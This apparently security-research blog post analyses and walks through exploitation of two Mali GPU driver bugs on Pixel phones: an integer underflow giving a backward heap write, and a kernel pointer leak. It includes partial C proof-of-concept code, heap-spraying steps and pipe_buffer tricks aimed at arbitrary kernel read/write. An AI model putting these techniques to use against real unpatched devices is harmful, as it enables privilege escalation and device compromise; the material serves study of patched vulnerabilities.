Mali GPU CVE-2023-48409: Analysis and Exploitation


1. Introduction

This exploit actually chains two vulnerabilities:

CVE-2023-48409: an integer underflow leading to an out-of-bounds (backwards) write

CVE-2023-26083: an information leak that discloses kernel pointers

2. Vuln Analysis

Underflow write

CVE-2023-48409

The vulnerable function gpu_pixel_handle_buffer_liveness_update_ioctl is shown below:

[screenshot: source of gpu_pixel_handle_buffer_liveness_update_ioctl]

Call chain:

kbase_api_buffer_liveness_update -> gpu_pixel_handle_buffer_liveness_update_ioctl

The call chain is short and the bug itself is not complicated: the overflow happens in the argument to kmalloc, i.e. buffer_info_size * 2 + live_ranges_size. Since update->buffer_count and update->live_ranges_count are both user-controlled, the two variables buffer_info_size and live_ranges_size that cause the overflow are controllable as well. The only thing that needs thought is how to turn this overflow into a working exploit (covered in the Exploit section below).

The bug is somewhat similar to CVE-2022-20186: the vulnerability sits right at the entry of the handler, and both stem from missing validation of user-supplied parameters leading to an integer overflow (which may help build some intuition for where to look for bugs in the Mali GPU driver).
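Since the screenshot above is not reproduced here, the core of the vulnerable logic can be sketched roughly as follows. This is a simplified reconstruction based on the description later in this post, not the verbatim driver source, and the info structure is flattened into locals:

static int gpu_pixel_handle_buffer_liveness_update_ioctl(struct kbase_context *kctx,
		struct kbase_ioctl_buffer_liveness_update *update)
{
	u64 *buff;
	struct kbase_pixel_gpu_slc_liveness_mark *live_ranges;
	int err;

	/* Both counts come straight from user space. */
	u64 const buffer_info_size = sizeof(u64) * update->buffer_count;
	u64 const live_ranges_size =
		sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * update->live_ranges_count;

	/* The size computation can wrap around (integer underflow/overflow). */
	buff = kmalloc(buffer_info_size * 2 + live_ranges_size, GFP_KERNEL);
	if (!buff)
		return -ENOMEM;

	/* info.buffer_va = buff; info.live_ranges points past the buffer_va and
	 * buffer_sizes arrays. u64 pointer arithmetic: a negative buffer_count
	 * moves live_ranges BEFORE buff. */
	live_ranges = (struct kbase_pixel_gpu_slc_liveness_mark *)(buff + update->buffer_count * 2);

	/* The first copy writes wherever live_ranges points -> backwards OOB write. */
	err = copy_from_user(live_ranges, u64_to_user_ptr(update->live_ranges_address),
			     live_ranges_size);

	/* ... remaining copies and kfree(buff) omitted ... */
	return err;
}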

A partial user-space PoC:

int main(){
// ...
struct kbase_ioctl_buffer_liveness_update u = {};
u.live_ranges_address = (__u64)ptr;
u.buffer_va_address = (__u64)-1; /* no need */
u.buffer_sizes_address = (__u64)-1; /* no need */
__u64 off = 0x8000;
__u64 size = 0x2c01;

__u64 buffer_info_size = 0;
__u64 live_ranges_size = 0;

u.buffer_count = (__u64)(-off/0x10);
u.live_ranges_count = size;

buffer_info_size = sizeof(__u64) * u.buffer_count;
live_ranges_size = sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * u.live_ranges_count;

err = kbase_api_buffer_liveness_update(fd,&u);
// ...
}

The fix is as follows:

commit: https://android.googlesource.com/kernel/google-modules/gpu/+/68073dce197709c025a520359b66ed12c5430914%5E%21/#F0

Patch

[screenshot: patch diff]

Leak kernel address

CVE-2023-26083

Call Chain

kbase_api_tlstream_acquire -> kbase_timeline_io_acquire -> kbase_timeline_acquire -> kbase_create_timeline_objects -> __kbase_tlstream_tl_kbase_new_kcpuqueue

1. kbase_api_tlstream_acquire

static int kbase_api_tlstream_acquire(struct kbase_context *kctx,
struct kbase_ioctl_tlstream_acquire *acquire)
{
return kbase_timeline_io_acquire(kctx->kbdev, acquire->flags);
}

2. kbase_timeline_io_acquire

int kbase_timeline_io_acquire(struct kbase_device *kbdev, u32 flags)
{
/* The timeline stream file operations structure. */
static const struct file_operations kbasep_tlstream_fops = {
.owner = THIS_MODULE,
.release = kbasep_timeline_io_release,
.read = kbasep_timeline_io_read,
.poll = kbasep_timeline_io_poll,
.fsync = kbasep_timeline_io_fsync,
};
int err;

if (!timeline_is_permitted())
return -EPERM;

if (WARN_ON(!kbdev) || (flags & ~BASE_TLSTREAM_FLAGS_MASK))
return -EINVAL;

err = kbase_timeline_acquire(kbdev, flags); // --> entry
if (err)
return err;

err = anon_inode_getfd("[mali_tlstream]", &kbasep_tlstream_fops, kbdev->timeline,
O_RDONLY | O_CLOEXEC);
if (err < 0)
kbase_timeline_release(kbdev->timeline);

return err;
}

The function kbase_timeline_io_acquire is part of the Arm Mali GPU driver (kbase). Its main job is to obtain a file descriptor for the timeline stream, so that user space can read the GPU's debugging and profiling data (it is somewhat sobering that this API can be called directly with ordinary user privileges and leak key GPU information).

The function does the following:

  1. Creates and returns an anonymous file descriptor through which user space can read the GPU timeline stream (used for debugging, profiling, etc.).
  2. Checks permissions and parameters, ensuring the caller is allowed to access the timeline stream and the supplied flags are valid.
  3. Initializes the timeline stream (if not already initialized) and associates it with the kbase_device (the Mali GPU device).
  4. Releases resources on failure to avoid leaks.

3. kbase_timeline_acquire

int kbase_timeline_acquire(struct kbase_device *kbdev, u32 flags)
{
int err = 0;
u32 timeline_flags = TLSTREAM_ENABLED | flags;
struct kbase_timeline *timeline;
int rcode;

if (WARN_ON(!kbdev) || WARN_ON(flags & ~BASE_TLSTREAM_FLAGS_MASK))
return -EINVAL;

timeline = kbdev->timeline;
if (WARN_ON(!timeline))
return -EFAULT;

if (atomic_cmpxchg(timeline->timeline_flags, 0, timeline_flags))
return -EBUSY;

#if MALI_USE_CSF
if (flags & BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) {
err = kbase_csf_tl_reader_start(&timeline->csf_tl_reader, kbdev);
if (err) {
atomic_set(timeline->timeline_flags, 0);
return err;
}
}
#endif

/* Reset and initialize header streams. */
kbase_tlstream_reset(&timeline->streams[TL_STREAM_TYPE_OBJ_SUMMARY]);

timeline->obj_header_btc = obj_desc_header_size;
timeline->aux_header_btc = aux_desc_header_size;

#if !MALI_USE_CSF
/* If job dumping is enabled, readjust the software event's
* timeout as the default value of 3 seconds is often
* insufficient.
*/
if (flags & BASE_TLSTREAM_JOB_DUMPING_ENABLED) {
dev_info(kbdev->dev,
"Job dumping is enabled, readjusting the software event's timeout\n");
atomic_set(&kbdev->js_data.soft_job_timeout_ms, 1800000);
}
#endif /* !MALI_USE_CSF */

/* Summary stream was cleared during acquire.
* Create static timeline objects that will be
* read by client.
*/
// Emit descriptions of the GPU device, memory regions and other objects for debugging tools to parse
kbase_create_timeline_objects(kbdev); //-----> leak here

#ifdef CONFIG_MALI_DEVFREQ
/* Devfreq target tracepoints are only fired when the target
* changes, so we won't know the current target unless we
* send it now.
*/
// Record the current GPU frequency target (used for devfreq analysis)
kbase_tlstream_current_devfreq_target(kbdev);
#endif /* CONFIG_MALI_DEVFREQ */

/* Start the autoflush timer.
* We must do this after creating timeline objects to ensure we
* don't auto-flush the streams which will be reset during the
* summarization process.
*/
// Start a timer that flushes timeline data to user space every AUTOFLUSH_INTERVAL milliseconds
atomic_set(&timeline->autoflush_timer_active, 1);
rcode = mod_timer(&timeline->autoflush_timer,
jiffies + msecs_to_jiffies(AUTOFLUSH_INTERVAL));
CSTD_UNUSED(rcode);

timeline->last_acquire_time = ktime_get_raw();

return err;
}

User space reaches this path via ioctl(fd, KBASE_IOCTL_TLSTREAM_ACQUIRE, &data); on success, timeline data can be read through the returned file descriptor. The timeline stream contains GPU scheduling, memory management, job execution and other events. The function we care about here is kbase_create_timeline_objects, which generates descriptions of the GPU device, memory regions and other objects.

4. kbase_create_timeline_objects

void kbase_create_timeline_objects(struct kbase_device *kbdev)
{
unsigned int as_nr;
unsigned int slot_i;
struct kbase_context *kctx;
struct kbase_timeline *timeline = kbdev->timeline;
struct kbase_tlstream *summary =
&kbdev->timeline->streams[TL_STREAM_TYPE_OBJ_SUMMARY];
u32 const kbdev_has_cross_stream_sync =
(kbdev->gpu_props.props.raw_props.gpu_features &
GPU_FEATURES_CROSS_STREAM_SYNC_MASK) ?
1 :
0;
u32 const arch_maj = (kbdev->gpu_props.props.raw_props.gpu_id &
GPU_ID2_ARCH_MAJOR) >>
GPU_ID2_ARCH_MAJOR_SHIFT;
u32 const num_sb_entries = arch_maj >= 11 ? 16 : 8;
u32 const supports_gpu_sleep =
#ifdef KBASE_PM_RUNTIME
kbdev->pm.backend.gpu_sleep_supported;
#else
false;
#endif /* KBASE_PM_RUNTIME */

/* Summarize the Address Space objects. */
for (as_nr = 0; as_nr < kbdev->nr_hw_address_spaces; as_nr++)
__kbase_tlstream_tl_new_as(summary, &kbdev->as[as_nr], as_nr);

/* Create Legacy GPU object to track in AOM for dumping */
__kbase_tlstream_tl_new_gpu(summary,
kbdev,
kbdev->gpu_props.props.raw_props.gpu_id,
kbdev->gpu_props.num_cores);


for (as_nr = 0; as_nr < kbdev->nr_hw_address_spaces; as_nr++)
__kbase_tlstream_tl_lifelink_as_gpu(summary,
&kbdev->as[as_nr],
kbdev);

/*Trace the creation of a new kbase device and set its properties. */
/* Record detailed GPU device information: GPU ID, number of cores, number of compute shader groups, number of address spaces, cross-stream sync support, etc. */
__kbase_tlstream_tl_kbase_new_device(summary, kbdev->gpu_props.props.raw_props.gpu_id,
kbdev->gpu_props.num_cores,
kbdev->csf.global_iface.group_num,
kbdev->nr_hw_address_spaces, num_sb_entries,
kbdev_has_cross_stream_sync, supports_gpu_sleep);

/* Lock the context list, to ensure no changes to the list are made
* while we're summarizing the contexts and their contents.
*/
mutex_lock(&timeline->tl_kctx_list_lock);

/* Hold the scheduler lock while we emit the current state
* We also need to continue holding the lock until after the first body
* stream tracepoints are emitted to ensure we don't change the
* scheduler until after then
*/
rt_mutex_lock(&kbdev->csf.scheduler.lock);

for (slot_i = 0; slot_i < kbdev->csf.global_iface.group_num; slot_i++) {

struct kbase_queue_group *group =
kbdev->csf.scheduler.csg_slots[slot_i].resident_group;

if (group)
__kbase_tlstream_tl_kbase_device_program_csg(
summary,
kbdev->gpu_props.props.raw_props.gpu_id,
group->kctx->id, group->handle, slot_i, 0);
}

/* Reset body stream buffers while holding the kctx lock.
* As we are holding the lock, we can guarantee that no kctx creation or
* deletion tracepoints can be fired from outside of this function by
* some other thread.
*/
// Reset the body streams in preparation for writing dynamic object info
kbase_timeline_streams_body_reset(timeline);

rt_mutex_unlock(&kbdev->csf.scheduler.lock);

/* For each context in the device... */
/* Walk all GPU contexts; for each one:
1. take the context's KCPU queue lock and the MMU lock
2. create the context tracking object
3. record the address space assigned to the context
4. walk all KCPU command queues
5. release the locks */
list_for_each_entry(kctx, &timeline->tl_kctx_list, tl_kctx_list_node) {
size_t i;
struct kbase_tlstream *body =
&timeline->streams[TL_STREAM_TYPE_OBJ];

/* Lock the context's KCPU queues, to ensure no KCPU-queue
* related actions can occur in this context from now on.
*/
mutex_lock(&kctx->csf.kcpu_queues.lock);

/* Acquire the MMU lock, to ensure we don't get a concurrent
* address space assignment while summarizing this context's
* address space.
*/
mutex_lock(&kbdev->mmu_hw_mutex);

/* Trace the context itself into the body stream, not the
* summary stream.
* We place this in the body to ensure it is ordered after any
* other tracepoints related to the contents of the context that
* might have been fired before acquiring all of the per-context
* locks.
* This ensures that those tracepoints will not actually affect
* the object model state, as they reference a context that
* hasn't been traced yet. They may, however, cause benign
* errors to be emitted.
*/
__kbase_tlstream_tl_kbase_new_ctx(body, kctx->id,
kbdev->gpu_props.props.raw_props.gpu_id);

/* Also trace with the legacy AOM tracepoint for dumping */
__kbase_tlstream_tl_new_ctx(body,
kctx,
kctx->id,
(u32)(kctx->tgid));

/* Trace the currently assigned address space */
if (kctx->as_nr != KBASEP_AS_NR_INVALID)
__kbase_tlstream_tl_kbase_ctx_assign_as(body, kctx->id,
kctx->as_nr);


/* Trace all KCPU queues in the context into the body stream.
* As we acquired the KCPU lock after resetting the body stream,
* it's possible that some KCPU-related events for this context
* occurred between that reset and now.
* These will cause errors to be emitted when parsing the
* timeline, but they will not affect the correctness of the
* object model.
*/
// Dump KCPU queue information, which includes kernel pointer values
for (i = 0; i < KBASEP_MAX_KCPU_QUEUES; i++) {
const struct kbase_kcpu_command_queue *kcpu_queue =
kctx->csf.kcpu_queues.array[i];

if (kcpu_queue)
__kbase_tlstream_tl_kbase_new_kcpuqueue(
body, kcpu_queue, kcpu_queue->id, kcpu_queue->kctx->id,
kcpu_queue->num_pending_cmds); //-------> leak here
}

mutex_unlock(&kbdev->mmu_hw_mutex);
mutex_unlock(&kctx->csf.kcpu_queues.lock);

/* Now that all per-context locks for this context have been
* released, any per-context tracepoints that are fired from
* any other threads will go into the body stream after
* everything that was just summarised into the body stream in
* this iteration of the loop, so will start to correctly update
* the object model state.
*/
}

mutex_unlock(&timeline->tl_kctx_list_lock);

/* Static object are placed into summary packet that needs to be
* transmitted first. Flush all streams to make it available to
* user space.
*/
kbase_timeline_streams_flush(timeline);
}

5. __kbase_tlstream_tl_kbase_new_kcpuqueue

This step serializes the relevant data and stores it in the buffer, i.e. the stream, as shown below:

[screenshot: serialization of the kcpu queue tracepoint into the stream buffer]

The data read back looks like this:

[screenshot: data read back from the timeline stream]

The kernel address in the dump is the kernel address of the kbase_kcpu_command_queue structure (referred to simply as kcpu_queue from here on).

A partial PoC:

int kbase_api_handshake(int fd,struct kbase_ioctl_version_check *cmd)
{
int ret = ioctl(fd,KBASE_IOCTL_VERSION_CHECK,cmd);
if(ret) {
perror("ioctl(KBASE_IOCTL_VERSION_CHECK)");
}
return ret;
}

int kbase_api_set_flags(int fd, struct kbase_ioctl_set_flags *flags)
{
int ret = ioctl(fd,KBASE_IOCTL_SET_FLAGS,flags);
if(ret) {
perror("ioctl(KBASE_IOCTL_SET_FLAGS)");
}
return ret;
}

int kbase_api_tlstream_acquire(int fd, __u32 flags)
{

struct kbase_ioctl_tlstream_acquire data = { .flags = flags};
int ret = ioctl(fd,KBASE_IOCTL_TLSTREAM_ACQUIRE ,&data);
if(ret < 0 ) {
do_print("ioctl(KBASE_IOCTL_TLSTREAM_ACQUIRE): %s",strerror(errno));
} else {
do_print("Successfully set flags and file descriptor %d\n",ret);

}
return ret;
}


int main()
{
int fd = open_device("/dev/mali0");

struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
kbase_api_handshake(fd, &cmd);
struct kbase_ioctl_set_flags flags = {0};
kbase_api_set_flags(fd,&flags);

struct kcpu_args *ta = (struct kcpu_args *)calloc(sizeof(*ta),1);
ta->fd = fd;

ta->streamfd = kbase_api_tlstream_acquire(ta->fd,BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS);
if(ta->streamfd < 0) assert(1 == 0 && "Unable to have tlstream fd");

ta->kctx_id = kbase_api_get_context_id(ta->fd);
ta->kcpu_id = kbasep_kcpu_queue_new(ta->fd);
ta->kcpu_kaddr = get_kcpu_kaddr(ta);
do_print("[+] Got the kcpu_id (%d) kernel address = 0x%llx from context (0x%x)\n",
ta->kcpu_id,ta->kcpu_kaddr,ta->kcpu_id);
return 0;
}
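The helper get_kcpu_kaddr used above is elided in the snippet. One possible (hypothetical) implementation simply reads the timeline stream and scans it for a value that looks like an arm64 kernel pointer; the real PoC may instead parse the tracepoint packets properly, since the exact offset of the pointer depends on the serialization format:

/* Hypothetical sketch of get_kcpu_kaddr(): read the timeline stream and scan
 * for an 8-byte value that looks like a kernel pointer. */
__u64 get_kcpu_kaddr(struct kcpu_args *ta)
{
    unsigned char buf[0x1000];
    ssize_t n = read(ta->streamfd, buf, sizeof(buf));

    for (ssize_t i = 0; n > 8 && i + 8 <= n; i++) {
        __u64 v;
        memcpy(&v, buf + i, sizeof(v));
        /* arm64 kernel addresses have the top 16 bits set. */
        if ((v >> 48) == 0xffff && v != (__u64)-1)
            return v;
    }
    return 0;
}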

The permission check is shown below; on Linux kernel v5.8 and above it uses perfmon_capable():

static bool timeline_is_permitted(void)
{
#if KERNEL_VERSION(5, 8, 0) <= LINUX_VERSION_CODE
// return capable(CAP_PERFMON) || capable(CAP_SYS_ADMIN);
return kbase_unprivileged_global_profiling || perfmon_capable();
#else
return kbase_unprivileged_global_profiling || capable(CAP_SYS_ADMIN);
#endif
}

To trigger the overflow, the target structure chosen is pipe_buffer.

CONFIG_HARDENED_USERCOPY means that for objects allocated from the generic SLUB caches, every copy_from_user is checked: the copy size must be consistent with kmem_cache->size.

On the Pixel 6 the same method cannot be used to leak the address.

[screenshot]

3. Exploit

With the overflow and the address leak understood, the actual exploitation steps are not complicated.

STEP.1 Initialize the Mali GPU environment

int fd = open_device("/dev/mali0");

struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
kbase_api_handshake(fd, &cmd);
struct kbase_ioctl_set_flags flags = {0};
kbase_api_set_flags(fd,&flags);

STEP.2 Leak a kernel address via kbase_api_tlstream_acquire

struct kcpu_args *ta = (struct kcpu_args *)calloc(sizeof(*ta),1);
ta->fd = fd;

ta->streamfd = kbase_api_tlstream_acquire(ta->fd,BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS);
if(ta->streamfd < 0) assert(1 == 0 && "Unable to have tlstream fd");

ta->kctx_id = kbase_api_get_context_id(ta->fd);
ta->kcpu_id = kbasep_kcpu_queue_new(ta->fd);
ta->kcpu_kaddr = get_kcpu_kaddr(ta);
do_print("[+] Got the kcpu_id (%d) kernel address = 0x%llx from context (0x%x)\n",
ta->kcpu_id,ta->kcpu_kaddr,ta->kcpu_id);

The first two steps are straightforward and need little explanation.

Next comes the important part. The first thing to settle is the choice of buffer_info_size and live_ranges_size used for the overflow, so let's go back to the source code:

[screenshot: source of gpu_pixel_handle_buffer_liveness_update_ioctl]

Here sizeof(struct kbase_pixel_gpu_slc_liveness_mark) = 4; the structure kbase_pixel_gpu_slc_liveness_mark is shown below:

[screenshot: definition of struct kbase_pixel_gpu_slc_liveness_mark]

Note that the function above allocates the memory for buff with kmalloc; that pointer is stored in the buffer_va field of the info structure, and info.live_ranges is set to buff + update->buffer_count * 2 (note that buff is a u64 pointer, so the actual byte offset is update->buffer_count * 2 * 8). The first copy_from_user that follows then copies data from user space into info.live_ranges.

Since both variables involved in the overflow are controllable, we can set update->buffer_count to a negative value. After live_ranges is computed as buff + update->buffer_count * 2, it points into the heap memory in front of buff, and because the first copy_from_user writes into the buffer that live_ranges points at, this gives us a backwards out-of-bounds write.

Given that update->buffer_count must be negative, update->live_ranges_count clearly has to be positive (to keep the size requested from kmalloc positive). The next question is: what exactly should these two values be set to?

First, we should avoid having the allocation served directly by the SLUB allocator, because of CONFIG_HARDENED_USERCOPY: under this default configuration, copy_from_user first checks whether the copy size stays within the size of the target object's cache (kmem_cache->size) to decide whether the copy is legal. If, on the other hand, the allocation goes straight to the page allocator (a kmalloc size larger than 8 KiB is enough), this protection is bypassed.

With the rough allocation size settled, we now need to pick the structure to write over out of bounds, and there hardly seems to be a better object than pipe_buffer. With the right heap feng shui, and given that we have already leaked an address and that the VMEMMAP base address is not randomized on Android kernels, a single out-of-bounds write is enough to make it point at the target read/write region.
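For reference, pipe_buffer is the small per-page descriptor in a pipe's ring; overwriting its page pointer (plus offset/len/flags) redirects subsequent reads and writes on that pipe. A rough sketch of the fake entry follows, with the struct redefined for user space; fake_page_addr and valid_ops_ptr are placeholders, and deriving the struct page address from the leaked kcpu_queue address via the fixed vmemmap base is device/kernel specific:

struct pipe_buffer {          /* layout as in include/linux/pipe_fs_i.h */
    __u64 page;               /* struct page * backing the pipe data     */
    __u32 offset, len;        /* valid data window within that page      */
    __u64 ops;                /* const struct pipe_buf_operations *      */
    __u32 flags;
    __u32 __pad;
    __u64 private_;
};

/* Sketch of the fake entry placed by the OOB write; fake_page_addr stands for
 * the struct page that backs the leaked kcpu_queue address. */
struct pipe_buffer fake = {
    .page   = fake_page_addr,
    .offset = 0,
    .len    = 0,              /* keep len 0 so the next write starts at offset 0 */
    .ops    = valid_ops_ptr,  /* placeholder so later pipe operations don't crash */
    .flags  = 0x10,           /* PIPE_BUF_FLAG_CAN_MERGE: allow in-place appends  */
};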

[screenshot]

The allocation size chosen here is order = 2, i.e. a 0x4000-byte chunk, because the kcpu_queue structure leaked earlier is also allocated from this order, we already know its kernel address, and the object can be allocated and freed at will, which gives us a very convenient heap-spray primitive.

Allocation:

int mfds[FDS]  = {};
__u32 kcpu_ids[FDS + 1][KBASEP_MAX_KCPU_QUEUES] = {}; /* last row holds the queues created on ta->fd */
for(int i = 0; i < FDS;i++) {
int ffd = open_device("/dev/mali0");
mfds[i] = ffd;
struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
kbase_api_handshake(ffd, &cmd);
struct kbase_ioctl_set_flags flags = {0};
kbase_api_set_flags(ffd,&flags);
}

/* Spray with page order 2 allocations to make the upcoming allocations
more predictable
*/
for(int i = 0; i < FDS;i++) {
for(int j=0; j < KBASEP_MAX_KCPU_QUEUES ;j++)
kcpu_ids[i][j] = kbasep_kcpu_queue_new(mfds[i]);
}

for(int i=0; i < (255 -1 );i++)
kcpu_ids[FDS][i] = kbasep_kcpu_queue_new(ta->fd);

Freeing:

struct kbase_ioctl_kcpu_queue_delete _delete = { .id = kcpu_id };
kbasep_kcpu_queue_delete(fd,&_delete);

In the original exploit the values are set to update->buffer_count = -0x800 and update->live_ranges_count = 0x2c01, which gives buffer_info_size = -0x4000 and live_ranges_size = 0xB004, so buffer_info_size * 2 + live_ranges_size = -0x4000 * 2 + 0xB004 = 0x3004. 0x3004 is the final size passed to kmalloc, and it is likewise served from an order-2 allocation.
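Spelled out (all arithmetic is modulo 2^64, with sizeof(__u64) == 8 and sizeof(struct kbase_pixel_gpu_slc_liveness_mark) == 4):

/*
 * buffer_count      = -0x800      ->  buffer_info_size = 8 * -0x800  = -0x4000
 * live_ranges_count =  0x2c01     ->  live_ranges_size = 4 *  0x2c01 =  0xb004
 *
 * kmalloc size = buffer_info_size * 2 + live_ranges_size
 *              = -0x8000 + 0xb004 = 0x3004      (> 8 KiB -> page allocator, order 2)
 *
 * live_ranges  = buff + buffer_count * 2        (u64 pointer arithmetic)
 *              = buff - 0x1000 * sizeof(u64) = buff - 0x8000 bytes,
 * so the copy_from_user destination starts 0x8000 bytes before buff
 * (matching off = 0x8000 in the PoC above).
 */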

Note: when copy_from_user hits unmapped user memory partway through a copy, it fails: the data copied so far has already been written, the remaining destination bytes in the kernel are zero-filled, and an error value is returned so the function returns early. That is exactly what we want here: the first copy_from_user, right after it has overwritten the contents of the preceding pipe_buffer, is made to access unmapped user memory so that it fails on purpose and returns early. This also avoids trouble later from the overly large update->buffer_count when the subsequent copy_from_user calls would otherwise run.

https://elixir.bootlin.com/linux/v5.10.234/source/lib/usercopy.c#L11

[screenshot: copy_from_user in lib/usercopy.c]

Since Step 2 already leaked the kernel address of the kcpu_queue, we can now free that chunk and spray pipe_buffer objects to reclaim it.
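One plausible way to do the spray is sketched below; the pipe size is an assumption (not necessarily the original PoC's value), chosen so that the pipe_buffer ring itself becomes an order-2 allocation like the freed kcpu_queue chunk:

/* Sketch: spray pipes whose pipe_buffer ring can reclaim the freed order-2 chunk.
 * F_SETPIPE_SZ resizes the ring: 256 slots * sizeof(struct pipe_buffer) (40 bytes)
 * is about 10 KiB, which is served by the page allocator as an order-2 allocation. */
#define NR_PIPES 64

int pipes[NR_PIPES][2];
for (int i = 0; i < NR_PIPES; i++) {
    if (pipe(pipes[i]) < 0)
        err(1, "pipe");
    if (fcntl(pipes[i][0], F_SETPIPE_SZ, 256 * 0x1000) < 0)
        err(1, "F_SETPIPE_SZ");
    /* Write some data so the first pipe_buffer entries are populated. */
    write(pipes[i][1], "AAAAAAAA", 8);
}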

[screenshot]

Once this is done, we can construct the situation shown below, building a two-stage write pipe and achieving arbitrary kernel address read/write.

[screenshot: two-stage write pipe layout]

This also uses a small trick mentioned by the original author. As shown in the figure above, a normal read/write changes the offset/len fields, which shifts the position of the next read or write: for instance, after writing 0x28 bytes into the pipe, the next write lands 0x28 bytes further on (reflected in the len field), so we would not be able to repeatedly overwrite pipe_buffer C in the figure above.

Quoting the example the original author gives:

We want to write 8 bytes of data via write, place that 8-byte buffer immediately before an unmapped or unreadable memory region, and then pass 9 as the size argument to write. In practice only 8 bytes are copied successfully; the 9th byte lies in the unmapped region, so its copy fails, satisfying the failure condition. At this point the data has effectively been written into the target kernel buffer while the .len field remains unmodified: the pipe_write kernel function simply returns without updating buf->len. The corresponding kernel code is shown below:
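A minimal user-space sketch of that trick (value_to_write and pipe_write_fd are placeholder names):

/* Place 8 payload bytes right before an unmapped page, then ask write() for 9
 * bytes: pipe_write copies the 8 mapped bytes into the target page, faults on
 * the 9th, returns -EFAULT and never updates buf->len. */
char *area = mmap(NULL, 2 * 0x1000, PROT_READ | PROT_WRITE,
                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
munmap(area + 0x1000, 0x1000);                  /* second page is now a hole   */

char *p = area + 0x1000 - 8;                    /* 8 bytes, ending at the hole */
memcpy(p, &value_to_write, 8);
write(pipe_write_fd, p, 9);                     /* only the first 8 bytes land */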

https://elixir.bootlin.com/linux/v5.10.234/source/fs/pipe.c#L465

[screenshot: pipe_write in fs/pipe.c]

Step

The exploitation steps are:

  1. Initialize the Mali GPU environment.
  2. Leak the kernel address of a kcpu_queue structure via kbase_api_tlstream_acquire.
  3. Build the contents of a fake pipe_buffer whose page field points at the kernel address where the kcpu_queue leaked in step 2 resides; this fake content is what the backwards overflow write in step 5 will place over the original pipe_buffer.
  4. Spray kcpu_queue structures (size 0x38c8) so that the upcoming allocations land in memory that is as contiguous as possible.
  5. Allocate two pipe_buffer rings (one for writing, one for reading), then set buffer_info_size and live_ranges_size and call kbase_api_buffer_liveness_update to trigger the backwards out-of-bounds write, overwriting the two pipe_buffers allocated just before.
  6. Free the kcpu_queue from step 2 and spray pipe_buffer rings to reclaim that chunk; since its address was leaked, once the spray lands we know the address of the corresponding pipe_buffer.
  7. Because step 5 made the fake pipe_buffer's page point at the address from step 6, and the contents at that address have now been replaced by a sprayed pipe_buffer, we end up with a two-stage write pipe and thus arbitrary kernel address read/write.

Final

[screenshot: final result]

References

  • Title: Mali GPU CVE-2023-48409: Analysis and Exploitation
  • Author: henry
  • Created at : 2025-05-28 14:06:52
  • Updated at : 2025-05-28 14:20:45
  • Link: https://henrymartin262.github.io/2025/05/28/Pixel_GPU_Exploit/
  • License: This work is licensed under CC BY-NC-SA 4.0.